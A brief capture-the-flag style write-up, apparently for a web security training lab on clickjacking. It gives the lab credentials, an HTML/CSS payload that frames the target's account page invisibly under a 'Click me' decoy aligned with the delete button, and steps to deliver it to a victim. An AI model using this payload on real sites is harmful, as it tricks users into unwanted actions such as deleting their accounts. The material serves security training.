Basic clickjacking with CSRF token protection

Basic clickjacking with CSRF token protection

Solution

Login as user: wiener

L: wiener
P: peter

Prepare payload to clickjacking

I have to change row: width, height, opacity and top, left and matching to website ("Click me" must be above the delete button)
---
<style>
    iframe {
        position:relative;
        width:1000px;
        height: 700px;
        opacity: 0,8;
        z-index: 2;
    }
    div {
        position:absolute;
        top:500px;
        left:60px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0afd004b03f19c76806553f2002800c1.web-security-academy.net/my-account"></iframe>

Delivery exploit to victim

Click "Store" --> "View exploit" --> "Delivery exploit to victim"